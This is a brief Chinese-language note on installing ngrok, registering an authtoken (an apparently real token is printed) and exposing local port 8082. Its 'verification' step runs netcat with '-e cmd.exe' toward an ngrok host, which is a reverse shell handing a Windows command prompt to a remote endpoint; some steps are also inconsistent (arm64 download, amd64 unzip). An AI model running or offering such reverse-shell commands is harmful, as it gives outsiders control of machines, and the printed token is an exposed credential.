- 官网
下载
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm64.zip
解压缩
cd /share/
unzip ngrok-stable-linux-amd64.zip
验证
./ngrok authtoken <your_auth_token>
# 可使用GitHub进行注册,得到一串auth_token
./ngrok authtoken 1f20YtlN9z5mpVq9f6w9ZeJEcZ0_2vmxDzMutkV1wNbgx1t2C
帮助文档
./ngrok help
运行
./ngrok http 8082
验证
nc -vv <yourserver> <port> -e c:\Windows\System32\cmd.exe
nc -vv http://a9ea91eebfc8.ngrok.io 8082 -e c:\Windows\System32\cmd.exe
参考
OSCHINA:CentOS7.x搭建ngrok内网穿透
https://my.oschina.net/yun7/blog/2874128